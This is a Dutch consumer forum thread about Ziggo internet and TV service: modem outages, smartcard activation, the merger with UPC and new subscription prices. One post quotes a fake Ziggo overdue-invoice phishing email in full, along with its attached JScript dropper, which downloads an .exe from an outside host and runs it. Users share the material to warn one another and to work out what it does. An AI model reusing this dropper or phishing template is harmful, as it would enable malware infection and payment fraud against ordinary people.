heb echte grote pieken nog niet gezien maar zou niet weten waarom het modem anders over de kop gaat
code:
1 2 3 4 5 6 7 8 9 10 11 12 Model: Cisco EPC3928AD Vendor: Cisco Hardware Revision: 1.0 Serial Number: 270324123 MAC Address: 08:80:39:d2:8f:ba Bootloader Revision: 2.4.0beta3_R4 Current Software Revision: epc3928a-E10-5-v302r125572-131030c-ZIG Firmware Name: epc3928a-E10-5-v302r125572-131030c-ZIG.bin Firmware Build Time: Oct 30 11:00:08 2013 Cable Modem Status: Operational Wireless Network: Enable System Uptime: 54 days 01h:26m:12s
UPNP staat al uit:)
Ik heb klachten betreffende het wegvallen van de internet verbinding. Zeer geregeld heb ik time-outs, waarbij zaken als RDP , IRC en teamviewer heel kort de verbinding verliezen.
Monteur heeft modem vervangen ( voor wéér een ubee 321) kabels vervangen daar waar nodig. Al lagen er al zeer goede kabels.
Modem staat in bridge, en ook met de pc direct op de ubee nog steeds problemen.
Helaas had de monteur geen technicolor modem beschikbaar.
Maandag maar weer bellen...
Waar kun je die kopen? Ik kom ze helemaal nergens tegen in de losse verkoop.
Overlever van KampeerMeet 4.1
"Als David Attenborough een film van jou zou moeten maken zou hij het moeilijk krijgen." - TDW
Dat klinkt als telefoonkabel.Volkert schreef op zondag 12 april 2015 @ 13:31:
Even een vraagje: Ik had ooit zo'n hele lange en dunne Ziggo UTP-kabel met maar 4 draadjes erin (max 100Mbps=OK).
This post is warranted for the full amount you paid me for it.
Verwijderd
Waarom zou je deze nog willen hebben?Volkert schreef op zondag 12 april 2015 @ 13:31:
Even een vraagje: Ik had ooit zo'n hele lange en dunne Ziggo UTP-kabel met maar 4 draadjes erin (max 100Mbps=OK).
Nepmail!
Dropbox link is gelukkig al dood.Ziggo
Klik hier om de online factuur te bekijken <https://www.dropbox.com/s/x6t9psnjn10aht6/factuur11047.zip?dl=1>.
Ziggo <http://ziggo.ziggo.mailplus.nl/nct2231782/HCkZrNfTLJzx333-141987>
Openstaande facturen
Geachte heer, mevrouw,
Tot onze spijt heeft u, ondanks eerder(e) verzoek(en), onze openstaande vordering nog niet voldaan. Hiervoor heeft u inmiddels ruimschoots de tijd gehad. U bent op dit moment met
betaling in verzuim.
Het is mogelijk dat deze brief uw betaling gekruist heeft. In dat geval bieden wij u onze
verontschuldiging aan en mag u deze brief als niet verzonden beschouwen. Indien u nog niet betaald heeft, bieden wij u alsnog de gelegenheid om aan uw verplichting te voldoen.
Wij stellen u nog 14 dagen in de gelegenheid om het verschuldigde bedrag te betalen op
bankrekening RABONL2U NL77RABO 0115856730 t.n.v. Ziggo. Voor een specificatie van de
vordering verwijzen wij u naar de bijlage <https://www.dropbox.com/s/x6t9psnjn10aht6/factuur11047.zip?dl=1>.
Mochten wij uw betaling niet binnen de gestelde termijn ontvangen, dan maken wij aanspraak op
vergoeding van kosten. Naast de in bijlage <https://www.dropbox.com/s/x6t9psnjn10aht6/factuur11047.zip?dl=1> genoemde hoofdsom bent u dan incassokosten
verschuldigd.
De incassokosten zullen ?40,00 bedragen.
Na de eerder genoemde 14 dagen zal de vordering als incasso behandeld worden en komen de
daarbij behorende kosten geheel voor uw rekening. Wij zullen onze vordering uit handen geven aan
Bos Incasso.
Wij hopen echter dat u voor een tijdige betaling zorgt en dat hiermee de incassomaatregelen
achterwege kunnen blijven.
Met vriendelijke groet,
Ziggo
Er zit ook een echte bijlage bij de mail, factuur11047.zip. Daarin zit factuur11047.js. Daarin staat:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
| function factuur(fr) {
var b = "milgayaa.com"
var c = "/muzzo"
var d = ".e"
var e = "xe"
for (var i = 0; i < b.length; i++) {
var ws = new ActiveXObject("WScript.Shell");
var fn = ws.ExpandEnvironmentStrings("%APPDATA%") + String.fromCharCode(92) + Math.round(Math.random() * 100000000) + "" + d + "" + e + "";
var dn = 0;
var xo = new ActiveXObject("MSXML2.XMLHTTP");
xo.onreadystatechange = function() {
if (xo.readyState == 4 && xo.status == 200) {
var xa = new ActiveXObject("ADODB.Stream");
xa.open();
xa.type = 1;
xa.write(xo.ResponseBody);
if (xa.size > 5000) {
dn = 1;
xa.position = 0;
xa.saveToFile(fn, 2);
try {
ws.Run(fn, 1, 0);
} catch (er) {};
};
xa.close();
};
};
try {
xo.open("GET", "http://" + b + "" + c + "" + d + "" + e + "", false);
xo.send();
} catch (er) {};
if (dn == 1) break;
}
};
factuur(6151); |
Ik weet niet wat het doet, maar het is vast niet leuk.
[edit]Hmm, ik gok dat hij milgayaa.com/muzzo.exe zal proberen te downloaden (bestaat!) en uit te voeren?
[edit]
Volledige mail met headers: http://members.ziggo.nl/sinaasappel/virus_ziggo_mail
[ Voor 4% gewijzigd door Mentalist op 12-04-2015 21:18 ]
Verstuurd vanaf mijn Computer®
Maybe dit ook even bij Ziggo zelf neerleggen? Dan kunnen ze er wellicht een waarschuwing uit doen.
ik heb geen idee hoe ik dat moet checken op een Linux distro. Er staat wel wine op maar ik gok dat dit virus niet compatible zal zijn. Ik weet niet waar wine %APPDATA% opslaat. (ik zou niet eens weten waar het bij Windows naar verwijst)Jerrythafast schreef op zondag 12 april 2015 @ 20:30:
Het downloadt dat en slaat het op als %APPDATA%\[random getal].exe. Daarna probeert het het uit te voeren. Als je dus bent gegrepen door deze malloot kun je dat checken door te kijken of er in %APPDATA% (Windows-toets + R indrukken, dan %APPDATA% intoetsen) een programmabestand staat met een random getal als naam.
https://twitter.com/W3ird_N3rd/status/587322355552280576Maybe dit ook even bij Ziggo zelf neerleggen? Dan kunnen ze er wellicht een waarschuwing uit doen.
[ Voor 58% gewijzigd door rick77 op 12-04-2015 20:37 ]
"wine cmd" geeft een prompt en cd %APPDATA% gaat naar c:\users\gebruikersnaam\Application Data. De inhoud daarvan is terug te vinden in /home/gebruikersnaam/.wine/drive_c/users/gebruikersnaam/Application Data. Er staat geen executable in.rick77 schreef op zondag 12 april 2015 @ 20:36:
Het is een environment variable. Als je "cd %appdata%" in een command prompt tikt weet je naar welke directory het verwijst.
.js bestanden worden standaard alleen maar in leafpad (teksteditor) geopend (net getest), dus hier alles goed. Maar dit kan best naar zijn als je Windows gebruikt. Ik weet niet zeker hoe het was geweest als de .js niet in een .zip had gezeten, al gok ik dat niet-IE browsers dat hele ActiveX gedoe (dat zal wel gebruikt worden voor het uitvoeren?) overslaan.Jerrythafast schreef op zondag 12 april 2015 @ 20:38:
Op Linux ben je niet vatbaar hiervoor, tenzij je daadwerkelijk dat script laat uitvoeren door JScript of Internet Explorer in Wine. Standaard verwijst %APPDATA% op Windows 7 naar C:\Users\[gebruiker]\AppData\Roaming.
[ Voor 9% gewijzigd door Mentalist op 12-04-2015 21:01 ]
Gelukkig was de helpdesk om 8:00 bereikbaar en hebben ze om 8:05 een nieuwe activatie gedaan voor de smartcard en kon ik vanaf de tweede ronde de Grand Prix van China bekijken in HD. Volgende keer maar voor de zekerheid de controle op de tv beneden doen... (of eigenlijk zou dit niet voor mogen komen)
Hoi Tekkel :W je kan vanuit mijn ziggo ook een herstel doen van je smartcard ;-) dan heb je het ook weer. Scheelt je op zondagochtend een belletjeTackleberry schreef op zondag 12 april 2015 @ 21:48:
Gisteravond laat besloten om voor vijf euro een maand Sport 1 af te sluiten. Na een kwartier werkte het, gecontroleerd op de tv boven. Echter toen ik 's ochtends beneden de tv aanzette, kwam er doodleuk een melding dat de zender geen onderdeel uitmaakt van mijn abonnement. Tijdje terug al eens gehad met het bestellen van een losse voetbalwedstrijd op FOX Sports Eredivisie.
Gelukkig was de helpdesk om 8:00 bereikbaar en hebben ze om 8:05 een nieuwe activatie gedaan voor de smartcard en kon ik vanaf de tweede ronde de Grand Prix van China bekijken in HD. Volgende keer maar voor de zekerheid de controle op de tv beneden doen... (of eigenlijk zou dit niet voor mogen komen)
[ Voor 73% gewijzigd door Koekenbakkertje op 12-04-2015 21:54 ]
Meen gelezen te hebben dat dat soms wel eens niet lukt en dat je dan beter het 0900 nummer kan bellen om de kaart te resetten.Koekenbakkertje schreef op zondag 12 april 2015 @ 21:53:
[...]
Hoi Tekkel :W je kan vanuit mijn ziggo ook een herstel doen van je smartcard ;-) dan heb je het ook weer. Scheelt je op zondagochtend een belletje
Is niet het 0900 nummer van de helpdesk, maar weet nummer zo even niet
2250 WP Zuid PVoutput
Er is niets veranderd aan de opstellingen. Op de andere TV's in huis geen problemen (voor zover ik dat gezien heb, het is niet constant namelijk. Zo kan het een uur of wat goed gaan, en zo ineens een paar keer in een half uur)
De TV waar het gebeurt hangt achter de Samsung Ct7140, die ik onlangs ook gereset heb, omdat deze bij het zappen een groen beeld en storing gaf, en daarna weer gewoon beeld gaf. Dat was verholpen na de reset (lijtk het)
Wow?jongetje schreef op zaterdag 11 april 2015 @ 15:41:
Super service van Ziggo. Gisterochtend nieuw modem aangevraagd (vanwege upgrade van mijn Z1) en staat nu al te draaien in bridge modus.
Eerst gebeld, eindeloos in de wacht zonder wachtrij indicatie vervolgens chat geprobeerd die wilde geen modem sturen maar eerst "technische analyse" en toen maar het contract formulier ingevuld. Vraag me af hoe lang het duurt.
Ohja ook twee Sony tv's in huis, beide met problemen met CAM authenticate. Blargh. Denk serieus aan overstappen.
Vreemd dat ze dat zelf niet aangeven bij de helpdesk, bespaart hen ook weer werk. Zal het voor de volgende keer onthouden.Koekenbakkertje schreef op zondag 12 april 2015 @ 21:53:
Hoi Tekkel :W je kan vanuit mijn ziggo ook een herstel doen van je smartcard ;-) dan heb je het ook weer. Scheelt je op zondagochtend een belletje
(typisch dat Mijn Ziggo nu offline is, wilde die optie even bekijken
Dit lijkt me normaal, de smartcard beneden heeft het nieuwe pakket nog niet ontvangen. Als de TV een uurtje aanstaat dan zal ie het nieuwe pakket wèl hebben.Tackleberry schreef op zondag 12 april 2015 @ 21:48:
Gisteravond laat besloten om voor vijf euro een maand Sport 1 af te sluiten. Na een kwartier werkte het, gecontroleerd op de tv boven. Echter toen ik 's ochtends beneden de tv aanzette, kwam er doodleuk een melding dat de zender geen onderdeel uitmaakt van mijn abonnement. Tijdje terug al eens gehad met het bestellen van een losse voetbalwedstrijd op FOX Sports Eredivisie.
Op het moment van het activeren van het nieuwe pakket zal er ook direct een signaal worden meegezonden om de smartcards van het nieuwe pakket te voorzien, als op dat moment al je TV's aanstaan gaat het dus ook goed.
Op de site vinden werkzaamheden plaats ivm overgangTackleberry schreef op zondag 12 april 2015 @ 23:42:
[...]
Vreemd dat ze dat zelf niet aangeven bij de helpdesk, bespaart hen ook weer werk. Zal het voor de volgende keer onthouden.
(typisch dat Mijn Ziggo nu offline is, wilde die optie even bekijken)
Ook prijsverhogingen voor de nieuwe abonnementen.
Het belangrijkste:
Bij een Abonnement op Horizon TV
Als je een Horizon TV-Abonnement hebt dan lenen we je maximaal het volgende aantal Mediaboxen specifiek voor Horizon TV uit:
1 Horizon Mediabox
2 Horizon Extra Mediabox
Daarnaast mag je nog maximaal het volgende extra in bruikleen bestellen:
2 Extra Standaard Mediaboxen of
2 CI+ modules of
1 Extra Standaard Mediabox en 1 CI+ module
en
Als je zelf apparatuur hebt aangeschaft en je maakt gebruik van onze Smartcards die uitgegeven zijn voor 13 april 2015, dan blijven we die ondersteunen. Behalve als je verhuist naar het gebied waar Ziggo voor 13 april 2015 UPC heette. Dan kan je onze smartcard niet meer blijven gebruiken met je eigen apparatuur. Losse Smartcards zijn niet meer verkrijgbaar vanaf 13 april 2015.
2. Als je overstapt naar een Abonnement op Digitale TV waarvoor je een Mediabox krijgt, dan mag het totaal van onze Mediaboxen samen met het aantal losse Smartcards voor je eigen Digitale Ontvanger, niet boven de 5 komen. Gebeurt dit wel, dan beslis jij welke Smartcard wij deactiveren. Je kunt met die apparatuur nog wel gebruik maken van Kabel TV.
[ Voor 88% gewijzigd door menalert op 13-04-2015 00:37 ]
[ Voor 10% gewijzigd door dejong12 op 13-04-2015 00:54 ]
Hoe weet je dat? De site van Ziggo doet het helemaal niet hier. Ik kon 10 minuten terug nèt de homepage inladen en daar staan links naar https://www.ziggo.nl/alles-in-1/start/ en https://www.ziggo.nl/tv-internet/start/. Van beiden is er een start, complete en max variant. Alleen kan ik verder dus niks zien want ik heb alleen de homepage.TexMex schreef op maandag 13 april 2015 @ 01:09:
Zo te zien zijn er ook geen losse internet abonnementen meer af te sluiten. Zonde!
Jawel internet complete voor 49,95 120mb/sTexMex schreef op maandag 13 april 2015 @ 01:09:
Zo te zien zijn er ook geen losse internet abonnementen meer af te sluiten. Zonde!
en internet max voor 53,95 200 mb/s inclusief kabel tv
Ah, OK. Die had ik nog niet gezien. De site lijkt nu weer te werken.Koekenbakkertje schreef op maandag 13 april 2015 @ 01:18:
[...]
Jawel internet complete voor 49,95 120mb/s
[ Voor 72% gewijzigd door TexMex op 13-04-2015 01:22 ]
Je eerdere bericht:TexMex schreef op maandag 13 april 2015 @ 01:19:
[...]
Ah, OK. Die had ik nog niet gezien. De site lijkt nu weer te werken.
Ah, dat was me dus niet duidelijk. Ik dacht dat je bedoelde zonder telefonie. TV(mediabox)+internet is trouwens maar €1,45/maand goedkoper dan Alles-in-1.Alle internet-pakketten die ik zag waren op zijn minst in combinatie met TV Standaard (inclusief mediabox). Een los internet-abonnement met alleen de ongecodeerde TV-zenders (zoals ik dat nu via UPC heb) ben ik nog niet tegengekomen. De site werd inderdaad al snel weer ontoegankelijk, dus misschien staat het alsnog ergens goed verborgen.
Hoe kom je daaraan?Koekenbakkertje schreef op maandag 13 april 2015 @ 01:18:
[...]
Jawel internet complete voor 49,95 120mb/s
[ Voor 27% gewijzigd door Koekenbakkertje op 13-04-2015 01:43 ]
Ik heb in febuari 2x of 3x telefonie opgezegd, zowel online als telefonisch. Per ~20 maart had ik over moeten zijn op TV+internet in plaats van Ai1. Denk je, dat zit toch goed dan!
Kijk ik nu op de factuur: nee hoor! Gewoon weer Ai1 factureren van 1 april tot 1 mei!
Dè developers podcast in je moerstaal : CodeKlets Podcast
Weet je zeker dat je Ziggo heb gebeld (1200, optie1, optie 3)? Ik heb al 3 keer gebeld voor verschillende mensen en elke keer netjes geholpen en wachtrij melding na het keuzemenu. Ze checken wat voor modem je hebt en als ze zien dat je nu een docsis2 hebt en er werd direct een nieuw modem, zonder verdere vragen, gestuurd. Vreemd dat jij totaal andere ervaringen hebt.sphere schreef op zondag 12 april 2015 @ 22:09:
[...]
Wow?
Eerst gebeld, eindeloos in de wacht zonder wachtrij indicatie vervolgens chat geprobeerd die wilde geen modem sturen maar eerst "technische analyse" en toen maar het contract formulier ingevuld. Vraag me af hoe lang het duurt.
Ohja ook twee Sony tv's in huis, beide met problemen met CAM authenticate. Blargh. Denk serieus aan overstappen.
De chat kan je idd niet helpen, die zijn voor sales.
Eindelijk weer tv kijken op de geroote galaxy s5
404 Signature not found
Heb hier ook last van gehad bij één tv, uiteindelijk heeft Ziggo de nieuwe 1.3 module aan mij vergoed (zonder randvoorwaarden).sphere schreef op zondag 12 april 2015 @ 22:09:
[...]
Mochten er andere zijn met hetzelfde probleem en een oplossing hebben, hoor ik dat natuurlijk ook graag
Erg handig ja, ik krijg ook een melding dat mijn iPhone gejailbreaked is en dat ik daarom geen zenders kan zien, maar als ik op play druk werken ze alsnog.SMSfreakie schreef op maandag 13 april 2015 @ 08:20:
handig dat de horion go app wel werkt itt tot de ziggo app....
Eindelijk weer tv kijken op de geroote galaxy s5
Ik heb een prima Humax, dus wil die gewoon houden, maar de diensten online kunnen nog wel eens handig zijn.
KIA EV3 GT-Line LR iPhone 17 Pro MacBook Air M4 iMac M4 iPad mini 6 Watch Series 10 TV 4K HDR AirPods Pro 2 & Max
Als het goed is kun je inderdaad van horizon.tv gebruik maken. Je hoeft ook niet over naar ander portfolio. Je zou wel gek zijn
[ Voor 22% gewijzigd door Koekenbakkertje op 13-04-2015 10:29 ]
Als het goed is wel, je kan alleen geen opnames voor je horizon box laten inplannen via de app natuurlijkTHE_BASE schreef op maandag 13 april 2015 @ 10:26:
Overigens vraag ik mij af: kan ik nu alle diensten van Horizon.tv gebruiken online en via applicatie zonder Mediabox?
Een handtekening?!
Dat maakt me niet uit. Feitelijk zou ik voor de nieuwe dienst 10 euro moeten gaan betalen (plus voor smartcards 2 euro extra per maand (heb er drie). En dan kan ik niet doorspoelen bij reclames. Dus ik hou het wel bij mijn Humax.tellavist schreef op maandag 13 april 2015 @ 10:36:
[...]
Als het goed is wel, je kan alleen geen opnames voor je horizon box laten inplannen via de app natuurlijk
KIA EV3 GT-Line LR iPhone 17 Pro MacBook Air M4 iMac M4 iPad mini 6 Watch Series 10 TV 4K HDR AirPods Pro 2 & Max
Dit kan alleen niet als je gebruik maakt van Replay TV (is opzich logisch aangezien het een gratis dienst is)THE_BASE schreef op maandag 13 april 2015 @ 10:38:
[...]
En dan kan ik niet doorspoelen bij reclames.
als je zelf iets opgenomen hebt kan je doorspoelen wat je wilt.
Een handtekening?!
En voor mij is niet alles beter geworden, maar alles is slechter geworden. Het zijn geen grote achteruitgangen, maar bij elkaar opgeteld is voor mij nu wel genoeg geweest. Ik ben overgestapt naar een andere alles-in-1 aanbieder. Niet om er wat aanbod betreft op vooruit te gaan, maar om zowel een statement te maken als dat ik de misleidende communicatie van Ziggo zat ben.
En het erge is nog dat je na opzegging een brief van de Ziggo krijgt waarin je verzocht wordt om Ziggo te bellen omdat je anders tegen mogelijke extra kosten aanloopt... WTF! Meer staat er niet in de brief.
Veel succes verder aan alle Ziggo klanten. Feel good!
Verwijderd
De hele overzetting van UPC naar Ziggo verloopt tot nu toe prima.
Het inloggen op Ziggo.nl ging vanochtend ook prima.
Maar door overbelasting en werkzaamheden lukt het
nu maar af en toe.
Ben benieuwd waar je heen bent gegaan?KoffieAnanas schreef op maandag 13 april 2015 @ 11:01:
Ik heb het gehad met Ziggo. Belofte was dat er niets zou veranderen, maar de afgelopen maanden is er telkens weer iets veranderd. Ze doen het in stapjes, maar er verandert steeds meer. En ik ben de 'feel good' en 'alles wordt beter' berichten wel een beetje zat. Ik woon niet in Amerika, geef mij maar Hollandse nuchterheid...
En voor mij is niet alles beter geworden, maar alles is slechter geworden. Het zijn geen grote achteruitgangen, maar bij elkaar opgeteld is voor mij nu wel genoeg geweest. Ik ben overgestapt naar een andere alles-in-1 aanbieder. Niet om er wat aanbod betreft op vooruit te gaan, maar om zowel een statement te maken als dat ik de misleidende communicatie van Ziggo zat ben.
En het erge is nog dat je na opzegging een brief van de Ziggo krijgt waarin je verzocht wordt om Ziggo te bellen omdat je anders tegen mogelijke extra kosten aanloopt... WTF! Meer staat er niet in de brief.Dus ik bel de Ziggo, krijg je wederom een 'feel good' medewerker (kots, kots) aan de telefoon met een 'feel good' afscheidspraatje. 'Ja meneer, we hebben alle begrip voor uw besluit. Jammer dat u vertrekt, want de fusie brengt alleen maar voordelen voor u. Zo willen juist trouwe klanten gaan belonen met korting e.d.". Blablabla. Kortom, de brief was alleen maar bedoeld om je te verleiden even te bellen met de Ziggo om een 'feel good' praatje aan te horen. Slimme marketingtruc, want mensen zijn eerder geneigd dit te accepteren dan andersom (dat de Ziggo uit zichzelf belt). Maar voor mij geldt door deze actie van Ziggo juist dat mijn overstap een juiste keuze is geweest.
Veel succes verder aan alle Ziggo klanten. Feel good!
Als het niet gaat zoals het moet, dan moet het maar zoals het gaat.
Dit topic is gesloten.
![]()
~~~[html]
Heb je nieuwe snelheden, heel fijn.. Maar daarmee hoeven we het topic niet te vervuilen!<br>
Werkt het niet, kijk eerst hier: <a href=https://allestoringen.nl/storing/ziggo>Ziggo Storingen</a>
~~~[/html]